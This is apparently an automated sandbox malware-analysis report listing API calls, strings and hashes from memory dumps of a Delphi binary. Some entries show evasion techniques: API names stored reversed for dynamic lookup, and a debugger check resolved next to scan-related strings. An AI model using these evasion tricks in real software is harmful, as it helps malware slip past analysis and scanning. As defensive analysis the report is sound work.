                                                                                                                                • 7, xrefs: 02B126A1
                                                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
                                                                                                                                • bytes: , xrefs: 02B1275D
                                                                                                                                • The unexpected small block leaks are:, xrefs: 02B12707
                                                                                                                                • , xrefs: 02B12814
                                                                                                                                • An unexpected memory leak has occurred. , xrefs: 02B12690
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                • API String ID: 0-2723507874
                                                                                                                                • Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                                • Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
                                                                                                                                • Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                                • Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6
                                                                                                                                  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                                • Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                                • Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
                                                                                                                                • Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                                • Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51
                                                                                                                                APIs
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$HandleModule
                                                                                                                                • String ID: KernelBase$LoadLibraryExA
                                                                                                                                • API String ID: 2226866862-113032527
                                                                                                                                • Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                                • Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
                                                                                                                                • Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                                • Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4
                                                                                                                                APIs
                                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
                                                                                                                                • GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
                                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                                • Opcode ID: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                                • Instruction ID: bef5d682c9f2e70c7491bc5fa255f4bb0a3e19e2733ebf28f773ca4da8d8f5ac
                                                                                                                                • Opcode Fuzzy Hash: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                                • Instruction Fuzzy Hash: D1F02470AE4344B5FB10A2A47D46F59737C9B04F61FD08AE6F364A60D087F080D58B22
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                  • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                  • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                  • Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                • CharToOemA.USER32(?,?), ref: 02B1AEFB
                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
                                                                                                                                • GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
                                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
                                                                                                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
                                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 185507032-0
                                                                                                                                • Opcode ID: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
                                                                                                                                • Instruction ID: cd67eec1a3a1098d4bf84476c16d8bbd776bc182aef4047e66fea2fae9599612
                                                                                                                                • Opcode Fuzzy Hash: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
                                                                                                                                • Instruction Fuzzy Hash: 6C1157B2949200BEE200FBA4CD84F9B77EDAF44700FC04AA5BB44D70E0DA75E9048B62
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
                                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
                                                                                                                                • VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 351091851-0
                                                                                                                                • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                • Instruction ID: a3cc6e153ce983e7b2c7c9f98c5c4049d16f7b45067a4cf59daf37eb1b059021
                                                                                                                                • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                • Instruction Fuzzy Hash: F351F8759012299BCB26DB58CC84BD9B3BDAF49300F8045E5EA08E7211DB34EF858FA5
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
                                                                                                                                • RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                                • Opcode ID: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                                • Instruction ID: 1c8feb75da51fdae4d5dbbc4daf5c7511bdc75fdfd5cd9d1bc68a892e1d899d5
                                                                                                                                • Opcode Fuzzy Hash: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                                • Instruction Fuzzy Hash: 1C01B575A54218BAEB11DF908D02BBD77ECDB08B00F9005E2BA04D7680F6B4A610CA59
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                                • API String ID: 667068680-1372893251
                                                                                                                                • Opcode ID: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                                • Instruction ID: fefa0f00f46704f3d8e6587eaa5a468e34159a77987ba8ebfc0d3ee2de320403
                                                                                                                                • Opcode Fuzzy Hash: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                                • Instruction Fuzzy Hash: 200162B5654304AFEB00EBA4DD41E9EB7FEEB48B10FA1C4E0F904D7604DA70A905DA28
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68
                                                                                                                                  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4102113445-0
                                                                                                                                • Opcode ID: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                • Instruction ID: 4600b78ba860fbead209e29b526e038162604ca901d989cbafc064485c8b12db
                                                                                                                                • Opcode Fuzzy Hash: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                                • Instruction Fuzzy Hash: 5201F2B16116446FF612BA64CD11BAF776DDB81710FD101F0F510E66D8DA75AE00CA64
                                                                                                                                APIs
                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F
                                                                                                                                  • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                                • Opcode ID: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                                • Instruction ID: ee8bb3042f577d2e0c7255a6f09aca5ea51ad736c6efaadc0f55119a3c858ffe
                                                                                                                                • Opcode Fuzzy Hash: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                                • Instruction Fuzzy Hash: F6419DB17055484BDB11EBB888906BFB3FBEF96300BE445E6D452C3394EB24F905CA65
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc
                                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                • API String ID: 1883125708-1952140341
                                                                                                                                • Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                                • Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
                                                                                                                                • Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                                • Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                • API String ID: 1646373207-2367923768
                                                                                                                                • Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                                • Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
                                                                                                                                • Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                                • Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                                • Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                                • Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
                                                                                                                                • Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                                • Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 02B1E353
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
